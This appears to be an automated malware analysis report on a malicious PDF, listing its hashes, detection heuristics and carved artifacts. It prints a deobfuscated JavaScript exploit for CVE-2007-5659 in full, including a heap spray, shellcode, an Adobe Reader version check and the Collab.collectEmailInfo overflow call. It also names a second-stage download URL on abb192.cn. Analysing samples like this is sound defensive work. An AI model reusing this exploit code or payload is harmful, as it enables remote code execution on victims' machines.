Malicious PDF — malware analysis report

Static analysis result for SHA-256 3d36aec3c15609dc…

MALICIOUS

PDF

Size: 4.7 KB
Created: 2008-08-06 01:42:27
Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12)
First seen: 2013-04-17
MD5: 419c1a1fac272aee74d6726303fbf373
SHA-1: 05d69ab3a79986dc336acfc6d9943c0df998c28d
SHA-256: 3d36aec3c15609dcaf8087c60aa64d7c89d412365d0f38c24cc8299cb2ffaf5d
Risk Score: 308

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), which is often employed to deobfuscate and execute malicious code. The extracted JavaScript object, javascript_obj0013_001.js, is likely responsible for the malicious behavior, potentially downloading and executing a second-stage payload. The confidence is moderate due to the obfuscated nature of the script.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (8)

  • Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE exact) CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action (low; 3 related findings) PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function EgoTBkRRL4(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function T5wNW(zDuIncDnPZTi){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(zDuIncDnPZTi)"+";"+"}");eval("function Exsae(twmzemlMEM){var S2lMI1HUnhZ="+"0,TsmvhZW4ldSLeQ=twmzemlMEM.l"+"en"+"gth,PIxGNXCAWrx=10"+"2"+"4,FBe7AXs,cRcICGl,MCvWVsntQ14wr1='',WBtBL=S2lMI1HUnhZ,yRfW5=S2lMI1HUnhZ,aKjGFvCmQ6ZJ=S2lMI1HUnhZ,vMRRMgWYai=Ar"+"ra"+"y(63,3,12,54 …
  • PDF exploit shellcode contains an embedded download URL (high) PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream (low) PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage (high) PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact (medium) EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://abb192.cn/spl3/load.php?id=869&spl=4 (referenced by PDF JavaScript)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0013_001.js
Kind: pdf-javascript-stream
Source: PDF /JS object 13 at offset 0x368
Size: 6403 bytes
SHA-256: 390f1f82bfb233929cfa063278e2f15c08efaf468b15df1eb358fcca4ca21c13
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 167 of 232 identifiers look randomly generated (e.g. 'K4qQHRKGGn51yLmvwgNXSWKTH5qAK4qQHRKvvRJN'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Filename: generic_stage_recovery_000.js
Kind: deobfuscated-js
Source: generic stage recovery (sixbit-xor-table) from JavaScript object 13 at offset 0x368
Size: 2592 bytes
SHA-256: 4199ae3fb0b16a04e8cd1f3a5013152056f58a39b6f47602c7eebc6dce515ef1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var ClHBMA0 = new Array(); function SqJE69Vs(GlfeRT, nEZ4Zc0rOQ3) { while (GlfeRT.length*2<nEZ4Zc0rOQ3){GlfeRT += GlfeRT;} GlfeRT = GlfeRT.substring(0,nEZ4Zc0rOQ3/2); return GlfeRT; } function gCnz38E8Fjz() { var BkIXClfozFsZr = 0x0c0c0c0c; var lGST25gp4 = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70%u2F33%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3638%u2639%u7073%u3D6C%u0034"); var SMUREWsVyMW43 = 0x400000; var XlIPaU = lGST25gp4.length * 2; var nEZ4Zc0rOQ3 = SMUREWsVyMW43 - (XlIPaU+0x38); var GlfeRT = unescape("%u9090%u9090"); GlfeRT = SqJE69Vs(GlfeRT, nEZ4Zc0rOQ3); var UJM1QonJv = (BkIXClfozFsZr - 0x400000)/SMUREWsVyMW43; for (var fIpC2poua8Sms8=0;fIpC2poua8Sms8<UJM1QonJv;fIpC2poua8Sms8++) { ClHBMA0[fIpC2poua8Sms8] = GlfeRT + 
lGST25gp4; } } function bIsdXP() { var wOtYR = app.viewerVersion.toString(); wOtYR = wOtYR.replace(/\D/g,""); var aYhCyHhQh1miRa = new Array(wOtYR.charAt(0),wOtYR.charAt(1),wOtYR.charAt(2)); if ((aYhCyHhQh1miRa[0] == 8 && ((aYhCyHhQh1miRa[1] == 1 && aYhCyHhQh1miRa[2] < 2) || aYhCyHhQh1miRa[1] < 1)) || (aYhCyHhQh1miRa[0] == 7 && aYhCyHhQh1miRa[1] < 1) || (aYhCyHhQh1miRa[0] < 7)) { gCnz38E8Fjz(); var AWuwpmaMC8Oa = unescape("%u0c0c%u0c0c"); while(AWuwpmaMC8Oa.length < 44952) AWuwpmaMC8Oa += AWuwpmaMC8Oa; this.collabStore = Collab.collectEmailInfo({subj: "",msg: AWuwpmaMC8Oa}); } } bIsdXP();